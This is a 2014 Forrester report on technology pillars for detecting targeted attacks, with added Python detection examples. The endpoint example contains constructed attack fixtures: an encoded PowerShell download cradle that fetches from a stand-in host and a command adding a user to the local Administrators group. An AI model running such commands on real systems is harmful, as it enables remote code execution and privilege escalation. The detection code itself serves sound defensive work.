
Forrester Targeted-Attack Hierarchy


Forrester Research, Inc., 60 Acorn Park Drive, Cambridge, MA 02140 USA
Tel: +1 617.613.6000 | Fax: +1 617.613.5000 | www.forrester.com

Targeted-Attack Hierarchy Of Needs, Part 2
by Rick Holland, July 24, 2014 | Updated: July 25, 2014

For: Security & Risk Professionals

Key Takeaways

Prevention Isn't Dead
There are innovative prevention technologies, but for these controls to be relevant, they must demonstrate operational effectiveness and scalability. Solutions that are appealing on datasheets must also work for the modern enterprise. If done well, prevention can relieve some of the daily operational burden and stress on S&R professionals.

No Single Technology Will Meet Your Breach Detection Needs
Investing in malware sandboxes alone isn't sufficient to defend the modern enterprise. You're going to need a combination of malware analysis, network analysis and visibility, endpoint visibility and control, and security analytics.

Invest In Vendors That Provide Multiple Pillars
Prioritize the vendors who can supply you with multiple technology pillars. Make sure that these vendors also offer a common user experience, and as many integrations between their technologies as possible. Vendors that can enable the orchestration of your defense should be at the top of your list.

© 2014, Forrester Research, Inc. All rights reserved. Unauthorized reproduction is strictly prohibited. Information is based on best available resources. Opinions reflect judgment at the time and are subject to change. Forrester, Technographics, Forrester Wave, RoleView, TechRadar, and Total Economic Impact are trademarks of Forrester Research, Inc. All other trademarks are the property of their respective companies. To purchase reprints of this document, please email [email protected]. For additional information, go to www.forrester.com.

Why Read This Report

    In part 1 of our research series, we detailed the foundational requirements for building the necessary resiliency to targeted cyberattacks. With the foundational requirements in place, security and risk (S&R) leaders are ready to turn their focus to the technologies for prevention as well as detection and response. S&R leaders frequently struggle with deploying the right mix of technologies to detect and respond to attacks. In this report, we discuss the four technologies that should form the pillars of your breach detection capabilities: malware analysis, network analysis and visibility, endpoint visibility and control, and security analytics. For each technology, we provide you with key evaluation criteria, considerations, and both commercial and open source solutions to help you select the right solution. These technologies, in the hands of skilled staff, are essential for building resiliency into your cybersecurity program.

Table Of Contents

Forrester's Targeted-Attack Hierarchy Of Needs Continues

Need No. 5: Prevention

Need No. 6: Detection And Response

You Must Build Each Tech Pillar Of The Breach Detection Stack

Pillar No. 1: Malware Analysis

Pillar No. 2: Network Analysis And Visibility

Pillar No. 3: Endpoint Visibility And Control

Pillar No. 4: Security Analytics

Balance The Pillars Based On Your Needs

What It Means

Detection And Response Require An Integrated Technology Stack

Supplemental Material

Notes & Resources

Forrester used a combination of primary and secondary research in the writing of this report.

Related Research Documents

Prepare For The Post-AV Era Part 1: Five Alternatives To Endpoint Antivirus, June 9, 2014

Introducing Forrester's Targeted-Attack Hierarchy Of Needs, Part 1 Of 2, May 15, 2014

Five Steps To Build An Effective Threat Intelligence Capability, January 15, 2013

Targeted-Attack Hierarchy Of Needs, Part 2: Multiple Technologies Are Required For Breach Detection
by Rick Holland with Stephanie Balaouras, Katherine Williamson, and Andrew Hewitt

July 24, 2014 | Updated: July 25, 2014


Forrester's Targeted-Attack Hierarchy Of Needs Continues

It's imperative that S&R leaders have a thoughtful and deliberate plan to fend off targeted cyberattacks. In part 1 of our research series, we focused on the fundamental requirements that S&R leaders must build into their security strategy: need No. 1: an actual security strategy; need No. 2: a dedication to recruiting and retaining staff; need No. 3: a focus on the fundamentals; and need No. 4: an integrated portfolio that enables orchestration (see Figure 1). Without fulfilling these fundamental needs, security organizations will struggle with even pedestrian adversaries and will certainly fail against more skilled ones. In this part 2 of our series, we discuss need No. 5: prevention, as well as the technologies associated with need No. 6: detection and response.

Figure 1 The Targeted-Attack Hierarchy Of Needs (the six needs, in order: an actual security strategy; a dedication to recruiting and retaining staff; a focus on the fundamentals; an integrated portfolio that enables orchestration; prevention; detection and response)

Source: Forrester Research, Inc.

    Need No. 5: Prevention

Prevention is dead, long live prevention. One of the recent trends in information security is to claim that prevention is dead. You should be particularly suspicious of detection-only vendors that make this claim. Investment will shift toward detection, but prevention isn't going away, and the reports of its death have been greatly exaggerated. When thinking about prevention, remember:


The Pareto principle applies. Not all attacks are targeted, and not all targeted attacks are from state actors or other sophisticated cyberadversaries. If you can use prevention to eliminate 80% of the attacks against your organization, you can focus your limited resources on detecting and responding to the attackers that have the motivation and capability to do the greatest harm. You don't want to be focusing on nuisance threats while skilled attackers are exfiltrating your most precious data.1 At a minimum, prevention eliminates noise.

Prevention can be innovative. Prevention can do more than just eliminate noise. Don't think of prevention as just antivirus (AV) blacklisting and IDS/IPS signatures; prevention can be much more than that. During the past 18 months, we have seen the emergence of innovative solutions at the endpoint, including Bromium, Invincea, and IBM Trusteer.2 RSA Conference Innovation Sandbox finalist Cylance, as well as Cyvera (recently acquired by Palo Alto Networks), are other examples of innovative endpoint security controls.3 The Microsoft Enhanced Mitigation Experience Toolkit (EMET) also provides this type of capability. It's important to note that even solutions designed to prevent zero-day attacks can be circumvented: In early July, researchers from Offensive Security were able to disable all of EMET's protections.4 Still, if you can prevent something malicious from occurring in the first place, there is no need for response.

Prevention must not negatively affect the user experience. You can have the most effective security control, but if it is so intrusive that employees can't work, it won't be in production for very long.5 This applies to endpoint security as well; the poor user experience of training a host intrusion prevention system (HIPS) is a prime example. These new endpoint solutions must demonstrate that they can be both effective and transparent to users.6 Many organizations, concerned about blocking legitimate actions, have adopted a lighter touch on the endpoint via endpoint visibility and control (EVC) solutions.

Prevention must demonstrate operational effectiveness and scalability. The user experience isn't the only perspective that S&R pros need to consider; the administrator's experience operationalizing the solution is also important. Dashboards and an intuitive user interface enhance operational effectiveness. Scalability is another important consideration: Deploying a solution to 100 endpoints is one thing; deploying it to 100,000 endpoints is an entirely different matter. Tanium, a solution with endpoint visibility capabilities, just received $90 million in funding in part because of its ability to deploy at scale for very large enterprises.7

    Prevention will always be a part of response. At a certain stage in detection, you will move to response. Blocking adversary command and control is one example of prevention. Prevention also occurs in the containment phase of response. From a network perspective, you might use network access control to kill the switch port connected to the infected host. You might use endpoint visibility and control to surgically kill a malicious process. You could also integrate with Active Directory to prevent a compromised account from accessing the network. The real questions regarding prevention are how will you integrate it into your portfolio and how can you use it as a force multiplier for your protection.


    Need No. 6: Detection and Response

Although prevention isn't dead, it can fail. Do you think a sophisticated adversary like the NSA or any other nation-state actor is going to cease targeting you once they discover you have the latest and greatest preventive controls? Absolutely not: A determined and well-resourced adversary will find a way to render these controls ineffective. Given the immaturity of most organizations, attackers don't even have to be that clever to accomplish their goals. Hope for prevention; plan on detection and response. When prevention fails, detection and response are your only options. Having capable incident response is critical. Forrester identified seven habits that effective incident response teams must possess.8 IR programs that adopt these principles will be better prepared to adapt to the threat landscape and will be able to recover from security incidents more effectively. From a technology perspective, there are four primary functions, or pillars, that are necessary for breach detection: 1) malware analysis; 2) network analysis and visibility (NAV); 3) endpoint visibility and control (EVC); and 4) security analytics (SA).

Threat intelligence will play an important role in detection and response.9 Vendors have bandied about and overused the term "actionable threat intelligence" so much that it has become a buzzword without meaning. This is unfortunate, because it is possible to turn multiple sources of intelligence into action, but doing so requires dedicated staff committed to following a continuous cycle of collecting, analyzing, and then disseminating intelligence. Forrester defines actionable intelligence as being accurate, aligned with intelligence requirements, integrated, predictive, relevant, tailored, and timely.10 You should leverage actionable threat intelligence within your technology stack to help you: 1) identify potential threats on the horizon targeting your industry or specific organization; 2) prioritize the remediation of vulnerabilities and architectural adjustments in your environment; and 3) identify the attacks that are already in progress. It's indispensable to both prevention and breach detection and response.

You Must Build Each Tech Pillar Of The Breach Detection Stack

    There is no single technology that will detect the intrusions and breaches within your organization; you need solutions that will help you build all four pillars of your breach detection stack (see Figure 2). You need to instrument your entire security organization for breach detection. This includes the people, process, and oversight required to make technology deployments successful.


Figure 2 Technology Pillars Of Breach Detection (the four pillars of detection are malware analysis, network analysis and visibility, endpoint visibility and control, and security analytics, with threat intelligence shown alongside them)

Source: Forrester Research, Inc.

Pillar No. 1: Malware Analysis

FireEye leveraged automated malware analysis to address threats that the traditional security vendors were failing to stop. FireEye took automated malware analysis mainstream; today, almost all security vendors have some sort of automated malware analysis capability. Malware analysis is frequently an organization's first foray into attempting to address the threat landscape. Generally speaking, malware analysis consists of dynamic and static analysis:

    Dynamic analysis executes and observes malware. Virtual sandboxes are a popular method for performing dynamic analysis. Advanced dynamic analysis introduces a debugger to observe the internal state of an executable. These automated malware analysis solutions inspect code and make a determination as to whether it is malicious in nature.

    Dynamic malware analysis can be effective at detecting malicious code; however, adversaries are well aware of this technology within their targets. This has led to a constant cat-and-mouse game in which adversaries try to evade analysis and vendors try to enhance their solutions with anti-evasion techniques. FireEye has written several blog postings illustrating the evolution of sandbox evasion. Most recently, they wrote about evasion techniques that require human interaction.11 Anti-evasion techniques are just some of the criteria that you need to consider when evaluating automated malware analysis capabilities (see Figure 3).


    Static analysis analyzes the code or structure of malware to understand how it functions. Unlike dynamic analysis, static analysis does not run the malware itself at the time of analysis. Malware authors make static analysis more difficult by obfuscating the execution of malware and by using packers to compress executables. More advanced static analysis involves reverse engineering the malware. Malware analysis solutions often include some very light static analysis to help detect malcode that might not execute in a virtual environment.
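As an added illustration (not from the Forrester report or from any vendor named in it), the following Python sketch shows the kind of "very light static analysis" described above: it measures byte entropy to flag probable packing and scans printable strings for API and artifact names that malware commonly uses to detect debuggers, virtual machines and sandboxes. The two samples are constructed byte blobs, not real malware, and the marker list and the 7.0 bits/byte entropy threshold are assumptions chosen for this example.

```python
import math
import random
import re
from collections import Counter
from dataclasses import dataclass, field

# Strings whose presence hints that the sample probes for a debugger, a VM or a sandbox.
# Illustrative list chosen for this example, not a vendor's detection set.
EVASION_MARKERS = {
    b"IsDebuggerPresent": "debugger check",
    b"CheckRemoteDebuggerPresent": "debugger check",
    b"GetTickCount": "timing check (catches sandboxes that fast-forward sleeps)",
    b"VBoxService": "VirtualBox artifact check",
    b"vmtoolsd": "VMware artifact check",
    b"GetCursorPos": "human-interaction check (mouse movement)",
    b"SbieDll.dll": "Sandboxie check",
}
HIGH_ENTROPY = 7.0  # bits/byte; near-uniform bytes mean a packed or encrypted body (assumed threshold)


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, from 0.0 (one repeated value) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def printable_strings(data: bytes, min_len: int = 6) -> list:
    """Runs of printable ASCII, the same thing the `strings` utility prints."""
    return [m.group() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


@dataclass
class StaticTriage:
    entropy: float
    likely_packed: bool
    evasion_hits: dict = field(default_factory=dict)
    verdict: str = "no static indicators"


def triage(sample: bytes) -> StaticTriage:
    """Light static pass of the kind an analysis appliance runs before (or instead of) detonation."""
    ent = shannon_entropy(sample)
    hits = {}
    for s in printable_strings(sample):
        for marker, meaning in EVASION_MARKERS.items():
            if marker in s:
                hits[marker.decode()] = meaning
    packed = ent >= HIGH_ENTROPY
    if packed and hits:
        verdict = "packed and sandbox-aware: detonate with anti-evasion (long timeout, simulated user) enabled"
    elif packed:
        verdict = "high entropy: probable packer, static signatures unreliable"
    elif hits:
        verdict = "evasion checks present: a clean sandbox run may be a false negative"
    else:
        verdict = "no static indicators"
    return StaticTriage(round(ent, 2), packed, hits, verdict)


# Constructed samples (not real malware): a plain binary-like blob, and a "packed" blob whose body is
# pseudo-random bytes with a small unpacked stub that still carries the evasion API names.
PLAIN_SAMPLE = (
    b"MZ\x90\x00This program cannot be run in DOS mode.\x00"
    b"kernel32.dll\x00CreateFileW\x00WriteFile\x00CloseHandle\x00" + b"\x00" * 512
)
rng = random.Random(2014)  # fixed seed so the constructed sample is reproducible
PACKED_SAMPLE = (
    b"MZ\x90\x00UPX0\x00UPX1\x00"
    + bytes(rng.getrandbits(8) for _ in range(4096))
    + b"IsDebuggerPresent\x00GetTickCount\x00VBoxService.exe\x00"
)

if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(name, triage(blob))
```

A high-entropy body with an unpacked stub that still names IsDebuggerPresent or VBoxService is exactly the case where a sandbox verdict alone can be a false negative; static hints like these let an analysis pipeline route the sample to a longer, anti-evasion-enabled detonation instead of trusting a clean five-minute run.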


Figure 3 Automated Malware Analysis Considerations, Key Evaluation Criteria, And Solutions

Source: Forrester Research, Inc.

Automated malware analysis

Considerations:

A combination of dynamic and static analysis can detect malware that traditional signature-based controls miss.

Sophisticated adversaries will circumvent dynamic malware analysis. Evasion detection is important.

Many organizations are overwhelmed by malware alerts. Alert-driven security is a reality.

Scalability is a challenge for on-premises malware analysis deployments when an organization is distributed with many ingress/egress points.

A malware analysis solution must observe malicious code; it isn't effective against threat vectors where the initial infection occurs in the extended enterprise, beyond perimeter security controls (watering hole attacks/SWC).

A malware analysis solution is unable to observe lateral movement where malicious code isn't involved.

For many vendors, malware analysis visibility is limited to web, email, and SMB protocols.

Organizations with operational security (OPSEC) concerns should consider on-premises or private cloud deployments. The analysis of malware that results in subsequent blocking could alert attackers.

Key evaluation criteria:

Deployment options: on-premises, cloud, hybrid.

On-premises deployment options: passive, passive blocking, inline blocking.

What malware analysis techniques are used (static, dynamic, emulation, network behavior)?

What types of content are inspected (executables, DLLs, archives, images, PDFs, Flash, Office documents, JavaScript)?

What anti-evasion techniques are used to ensure malware executes in the analysis environment?

What endpoint integrations exist? Integration with endpoint controls provides endpoint context. Was the endpoint already patched for the vulnerability being exploited? Endpoints can also perform containment/remediation.

Ability to perform dynamic analysis on customized virtual machine images.

Virtual machine operating system support (Windows, OS X).

Visibility into encrypted traffic.

Android APK analysis.

Ability to consume and export third-party threat intelligence (IODEF, OpenIOC, STIX/CybOX).

What NAV capabilities exist? Some of the vendor solutions not only offer automated malware analysis, but also offer NAV capabilities.


Figure 3 Automated Malware Analysis Considerations, Key Evaluation Criteria, And Solutions (Cont.)

Solutions:

Commercial: Blue Coat Norman Sandbox, Cyphort, Fidelis XPS Advanced Threat Defense, FireEye Threat Prevention Platform, LightCyber, Palo Alto Networks WildFire, Lastline, Seculert, ThreatGrid, Trend Micro Deep Discovery

Open source: Anubis, Cuckoo Sandbox, Minibis, Wepawet

Pillar No. 2: Network Analysis And Visibility

    One of the key components of a Zero Trust network is network analysis and visibility (NAV).12 NAV is a diverse set of tools designed to provide network-based situational awareness to S&R pros. NAV tools perform many functions including: malicious behavior detection, network discovery, flow analysis, meta-packet capture, full packet capture, and network forensics.13

    The convergence of some NAV and security information management/security information and event management (SIM/SIEM) capabilities is under way.14 LogRhythm is one of many SIM/SIEM solutions that can consume a number of flow formats. RSA has combined the network forensics capabilities of NetWitness with the SIM capabilities of enVision into its RSA Security Analytics solution. SIM/SIEM integration is just one of the criteria when considering NAV solutions (see Figure 4).


Figure 4 NAV Considerations, Key Evaluation Criteria, And Solutions

Source: Forrester Research, Inc.

Network analysis and visibility

Considerations:

Layer 7 visibility at the Internet perimeter(s) should be one of your first priorities. Similar visibility at data center ingress/egress should follow.

Packet capture at the Internet perimeter(s) is ideal. Similar capability at data center ingress/egress should follow. Packet capture fidelity is important; you cannot afford to drop or miss packets.

Flow data is probably already being used by infrastructure and operations (I&O); leverage it for security purposes. Flow data can be used for detection of attacker lateral movement; it is more scalable than packet capture for this use case.

NGFW/segmentation gateways provide NAV capabilities (detection of port hopping, SSH/SSL use, and use of nonstandard ports).

The more segmented the network, the more challenging NAV implementations become. Instrumenting enterprise networks for NAV takes time.

Do you trust the endpoint? NAV can validate what data the endpoint is reporting (situations where the endpoint is compromised with a rootkit).

NAV lacks the rich host context that endpoint visibility and control (EVC) solutions provide.

Key evaluation criteria:

What are the deployment options (i.e., physical/virtual, distributed)?

How much throughput can capturing devices handle (1Gbps, 10Gbps, 40Gbps)?

What are the storage capabilities of the solution (direct attached capacity/storage area network capabilities)?

How is indexing performed (metadata creation, PCAP association)?

What visualization capabilities exist to enhance analysis?

What behavioral analysis capabilities exist (malware command and control, data exfiltration)?

What encrypted traffic inspection capabilities exist?

What incident response/forensic analysis workflows exist?

How is searching performed? How long do searches take?

How does the solution ingest threat intelligence? Ability to consume and export third-party threat intelligence (IODEF, OpenIOC, STIX/CybOX). How can you hunt/search for threat indicators?

What applications are classified?

What endpoint integrations exist?

How is asset/individual risk used for triage (high-value targets like domain controllers, C-suite staff)?


Figure 4 NAV Considerations, Key Evaluation Criteria, And Solutions (Cont.)

Solutions:

Commercial: Arbor Networks Pravail Security Analytics, Blue Coat Security Analytics (Solera Networks), Damballa Failsafe, FireEye nPulse, Lancope StealthWatch, LightCyber Detect, Novetta Cyber Analytics, RSA Security Analytics (NetWitness/enVision)

Open source: Argus, Bro, Security Onion, Snorby, Snort OpenAppID, System for Internet-Level Knowledge (SiLK)
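To make the flow-based lateral-movement consideration in Figure 4 concrete, here is an added Python example (written for this page, not Forrester's or any NAV vendor's code) that works from NetFlow-style records rather than packets: it counts the distinct internal hosts each source reaches on administrative ports (RPC, SMB, RDP, WinRM) inside a sliding time window and flags sources whose fan-out exceeds a threshold. The address range, port list, thresholds, the baselined scanner host and the flow records themselves are all constructed assumptions for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Assumptions for this example; tune to your own address plan and observed baseline.
INTERNAL_RANGES = [ip_network("10.0.0.0/8")]
ADMIN_PORTS = {135: "RPC", 445: "SMB", 3389: "RDP", 5985: "WinRM"}
KNOWN_FANOUT_HOSTS = {"10.0.9.5"}   # hypothetical vulnerability scanner; legitimately touches everything
FANOUT_THRESHOLD = 5                # distinct internal targets on admin ports inside one window
WINDOW_SECONDS = 600


@dataclass(frozen=True)
class Flow:
    """One NetFlow/IPFIX-like record, reduced to the fields this detection needs."""
    start: int     # epoch seconds
    src: str
    dst: str
    dport: int
    nbytes: int


def is_internal(addr: str) -> bool:
    ip = ip_address(addr)
    return any(ip in net for net in INTERNAL_RANGES)


def lateral_movement_candidates(flows, window=WINDOW_SECONDS, threshold=FANOUT_THRESHOLD):
    """Map src -> sorted (dst, service) pairs for sources that reach `threshold` distinct internal
    hosts on admin ports within any `window`-second span. The widest qualifying window is kept."""
    per_src = defaultdict(list)
    for f in flows:
        if (f.dport in ADMIN_PORTS and f.src not in KNOWN_FANOUT_HOSTS
                and is_internal(f.src) and is_internal(f.dst)):
            per_src[f.src].append(f)

    alerts = {}
    for src, fl in per_src.items():
        fl.sort(key=lambda f: f.start)
        lo = 0
        for hi in range(len(fl)):
            while fl[hi].start - fl[lo].start > window:   # slide the window's left edge forward
                lo += 1
            targets = {(f.dst, ADMIN_PORTS[f.dport]) for f in fl[lo:hi + 1]}
            if len(targets) >= threshold and len(targets) > len(alerts.get(src, ())):
                alerts[src] = sorted(targets)
    return alerts


# Constructed sample flows: a workstation sweeping a server VLAN over SMB/RDP in four minutes, a file
# server with normal traffic, outbound web traffic that is ignored, the baselined scanner, and a
# "low and slow" host that spaces its hops 20 minutes apart and so stays under a 10-minute window.
T = 1_400_000_000
FLOWS = [
    Flow(T + 0,    "10.0.1.20", "10.0.2.10", 445,  18_200),
    Flow(T + 60,   "10.0.1.20", "10.0.2.11", 445,  17_900),
    Flow(T + 120,  "10.0.1.20", "10.0.2.12", 445,  18_100),
    Flow(T + 180,  "10.0.1.20", "10.0.2.13", 3389, 96_000),
    Flow(T + 240,  "10.0.1.20", "10.0.2.14", 445,  18_300),
    Flow(T + 4000, "10.0.1.20", "10.0.2.30", 445,  2_400),
    Flow(T + 10,   "10.0.1.20", "198.51.100.7", 443, 51_000),   # outbound web, not an admin port
    Flow(T + 30,   "10.0.1.50", "10.0.2.10", 445,  4_000),      # file server, normal
    Flow(T + 90,   "10.0.1.50", "10.0.2.11", 445,  3_800),
]
FLOWS += [Flow(T + i, "10.0.9.5", f"10.0.2.{i}", 445, 600) for i in range(1, 40)]
FLOWS += [Flow(T + 1200 * i, "10.0.3.7", f"10.0.2.{20 + i}", 3389, 40_000) for i in range(5)]

if __name__ == "__main__":
    for src, targets in lateral_movement_candidates(FLOWS).items():
        print(src, "->", targets)
```

The 10.0.3.7 host shows the limitation of a fixed window: an attacker who paces hops 20 minutes apart never trips a 10-minute threshold, so the same count should also be run over longer windows and compared against a per-host baseline of normal admin-port peers, which is where flow retention and the SIM/SIEM integration discussed above pay off.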

Pillar No. 3: Endpoint Visibility And Control

Endpoint visibility and control (EVC) seeks to provide detailed visibility into activity occurring on the endpoint. EVC solutions can provide details on endpoint process executions, application/file/registry modifications, network activity, active memory, as well as kernel-driver activity. Some EVC solutions provide visibility only, while others also provide the ability to contain malicious endpoint behavior.15

There are endpoint offerings like Palo Alto Networks Next-Generation Endpoint Protection, intended to prevent malicious activity from occurring in the first place. This is ideal, but working under the assumption that determined adversaries will find a way to circumvent your controls, visibility is also important. In 2012, Bit9 was targeted so that the adversary could breach a Bit9 customer. The attackers couldn't circumvent Bit9's whitelisting protection directly, so they compromised Bit9 itself and used its code-signing certificate to digitally sign their malware, making it appear to be legitimate, approved software.16 A deeper level of visibility on the hosts running this signed malware could have provided the company with valuable insight that might have accelerated the detection of malicious activity. Deep visibility is just one evaluation criterion to use when considering EVC solutions (see Figure 5).


Figure 5 Endpoint Visibility And Control Considerations, Key Evaluation Criteria, And Solutions

Source: Forrester Research, Inc.

Endpoint visibility and control

Considerations:

The extended enterprise makes endpoint security a necessity. Organizations have no visibility when endpoints are beyond the perimeter. For example, an endpoint perspective is needed to detect strategic web compromise/watering hole attacks when the host is remote.

An endpoint perspective is necessary to determine the impact of malware. Did it actually execute? Was the host already patched against the exploit?

Endpoint control provides the ability to perform surgical containment of malicious processes.

Endpoint solutions must demonstrate that they can deploy at scale in an operationally effective manner.

BYOC makes deployment challenging if not impossible.

Need to overcome yet-another-agent syndrome. The addition of a new endpoint agent can impact the resources available on a host already running multiple endpoint agents.

If the endpoint is already compromised, you cannot trust what it is reporting back. EVC must be deployed to a host in a known good state.

Key evaluation criteria:

Does the solution operate in user space or kernel space?

What impact does the EVC agent have on the host operating system (memory, CPU, disk)?

Does the solution provide visibility and monitoring only? What about containment?

What operating systems are supported (Windows, OS X)?

What workflow is used for enabling automated response (crawl, walk, run)?

What threat intelligence standards are supported (OpenIOC, STIX/TAXII/CybOX)?

What visualization capabilities exist to enhance analysis?

What incident response/forensic analysis workflows exist?

What network security/NAV integrations exist?

How does the solution ingest threat intelligence? How can you hunt/search for threat indicators?

What lateral movement detections exist? How does the solution detect privilege escalation or the use of legitimate Windows tools for malicious purposes?

What integrations exist for automated response (Active Directory integrations for account lockout, switch port integrations for disabling endpoint network access)?

How is asset/individual risk used for triage (high-value targets like domain controllers, C-suite staff)?

Solutions:

Commercial: Bit9, Carbon Black, Confer, CounterTack Sentinel, CrowdStrike Falcon Host, Cybereason, FireEye HX, Guidance Software Cyber Security, Hexis HawkEye G, Tanium, Triumfant, Verdasys Digital Guardian

Open source: Immunity El Jefe, OSSEC
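The criteria in Figure 5 ask how a solution detects the use of legitimate Windows tools for malicious purposes and how it performs surgical containment. As an added example (not from the report or from any EVC product), this Python code applies three such detections to constructed process-creation telemetry: an Office application spawning a script host, PowerShell running a base64-encoded download cradle, and net.exe adding a user to the local Administrators group. It then computes the process subtree that a surgical kill of the flagged process would have to terminate. The events, users and command lines are invented for the example; the decoded script fetches from a reserved .invalid domain.

```python
import base64
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Constructed process-creation record; Sysmon event ID 1 and most EVC agents report these fields."""
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str


@dataclass(frozen=True)
class Alert:
    pid: int
    rule: str
    detail: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
NET_IMAGES = {"net.exe", "net1.exe"}


def decode_encoded_command(cmdline: str):
    """-EncodedCommand payloads are base64 of UTF-16LE text; return the decoded script or None."""
    m = re.search(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Three detections over legitimate tools used maliciously; each returns the offending PID."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        img = e.image.lower()
        if img in SCRIPT_HOSTS and parent and parent.image.lower() in OFFICE_APPS:
            alerts.append(Alert(e.pid, "office-spawned-script-host", f"{parent.image} -> {e.image}"))
        if img == "powershell.exe":
            script = decode_encoded_command(e.cmdline)
            if script and re.search(r"downloadstring|invoke-expression|\biex\b", script, re.I):
                alerts.append(Alert(e.pid, "encoded-download-cradle", script))
        if img in NET_IMAGES and re.search(r"localgroup\s+administrators\s+\S+\s+/add", e.cmdline, re.I):
            alerts.append(Alert(e.pid, "local-admin-group-add", e.cmdline))
    return alerts


def containment_set(events, root_pid: int) -> set:
    """PIDs to terminate for a surgical kill of `root_pid` and everything it spawned."""
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e.pid)
    todo, seen = [root_pid], set()
    while todo:
        pid = todo.pop()
        if pid not in seen:
            seen.add(pid)
            todo.extend(children[pid])
    return seen


# Constructed sample: a macro document launches an encoded PowerShell cradle, which adds the user to
# the local Administrators group; a separate admin's signed inventory script must not be flagged.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED_CRADLE = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
EVENTS = [
    ProcEvent(4,   1,   "explorer.exe",   "explorer.exe", "CORP\\alice"),
    ProcEvent(120, 4,   "winword.exe",    "winword.exe /n invoice_Q3.docm", "CORP\\alice"),
    ProcEvent(133, 120, "powershell.exe", f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED_CRADLE}", "CORP\\alice"),
    ProcEvent(140, 133, "cmd.exe",        "cmd.exe /c net localgroup administrators alice /add", "CORP\\alice"),
    ProcEvent(141, 140, "net.exe",        "net localgroup administrators alice /add", "CORP\\alice"),
    ProcEvent(200, 4,   "powershell.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1", "CORP\\bob"),
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
    print("kill set for pid 133:", sorted(containment_set(EVENTS, 133)))
```

Note that the net.exe rule is keyed on the image name rather than on the command line alone; otherwise the cmd.exe parent that merely passes the command through would be flagged twice, and the containment set shows why the first malicious node (the PowerShell process), not the whole Office session, is the right place to cut.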


Pillar No. 4: Security Analytics

Few will argue that the traditional approach to SIM/SIEM is effective. Many claim to have intelligence-led security but actually have alert-driven security. To be at all useful, SIM/SIEM solutions require skilled analysts to operate and maintain them, the kind of staff few organizations have. In addition, clients regularly complain that the lack of any kind of meaningful context around alerts makes triage even more difficult.17 As a result:

Vendors are developing new security analytics (SA) solutions . . . The convergence of the correlating and reporting functions of SIM/SIEM, together with information feeds from data leak protection solutions, NAV solutions, identity and access management solutions, and even fraud solutions, will give S&R pros the kind of context and situational awareness they need for action. The challenge is that out-of-the-box SA solutions don't exist just yet. Vendors of legacy SIM/SIEM solutions are expanding the collection and analysis of new types of business and IT data to improve their ability to offer information in context, but many organizations are developing homegrown solutions using big data platforms like Hadoop. Still other vendors are hoping to disrupt the market with deep insights into particular domains like the endpoint. Both Guidance Software and CrowdStrike have analytics capabilities on the endpoint.18

. . . that can also automate remediation. Not only must SA provide you with actionable data, it must have the integrations and automation to help you take action. SA should help you avoid obstacles and see the road ahead. Proofpoint's recent acquisition of incident response and orchestration specialist NetCitadel is evidence that demand for SA solutions with automated response is heating up.19 Automation is just one criterion to consider when evaluating SA solutions (see Figure 6).


Figure 6 Security Analytics Considerations, Key Evaluation Criteria, And Solutions

Source: Forrester Research, Inc.

Security analytics

Considerations:

The SA vendors that can offer a platform that enables the orchestration of detection and response through integrations and automation will be an organization's most valuable partner.

Early adopters of big data solutions like Hadoop have had to develop their own security analytics capabilities, but this is starting to change as vendors bring prepackaged analytics online. There are still no turnkey offerings.

Technology is core to SA, but just as with SIM/SIEM, people and process ultimately determine success. Like anything else, don't think of SA as a silver bullet.

How much effort is required for you to implement and operationalize SA? If you don't have the resources, not unlike SIM/SIEM, MSSPs may be a more practical alternative for SA.

As SA platforms consume more and more data to provide richer context, you must make securing this data a priority. All your eggs are in one basket; you are concentrating your liability and you must protect the data.

Infrastructure is moving to the cloud; if you thought doing SA on-premises was challenging, the cloud will only complicate this more. Companies like Threat Stack and Alert Logic provide analytics into elastic infrastructure.

The disillusionment with SIM/SIEM has led to the emergence of SA capabilities within individual security controls. CrowdStrike released Endpoint Activity Monitoring, which embeds Splunk software as a machine data platform for the search, alerting, reporting, and analytics capabilities.

Key evaluation criteria:

What type of data can the SA solution consume (structured data, unstructured data, application data, log data, flow data, meta packet capture, full packet capture, event data, vulnerability data, identity data, third-party intelligence, data from elastic infrastructure)?

How does the solution ingest threat intelligence (JSON, CSV, XML)? What threat intelligence standards are supported (IODEF, OpenIOC, STIX/TAXII/CybOX)?

What analytic capabilities does the SA solution possess (statistical modeling, predictive analytics, behavioral modeling)?

What internal context is used to prioritize alerting? How are asset value, vulnerabilities present, attack path modeling, and identity incorporated into alert triage?

What external context is used to prioritize alerting? How are threat intelligence and real-world exploitation of vulnerabilities incorporated into alert triage?

What incident response/forensic analysis workflows exist? How can you hunt/search for threat indicators?

What lateral movement detections exist? How does the solution detect privilege escalation or the use of legitimate Windows tools for malicious purposes?

What analyst enrichments exist in the solution (GeoIP, passive DNS, asset value, Whois lookups)?

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 14

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Figure 6 Security Analytics Considerations, Key Evaluation Criteria, And Solutions (Cont.)

    Source: Forrester Research, Inc.116182

    Security analytics

    Key evaluationcriteria

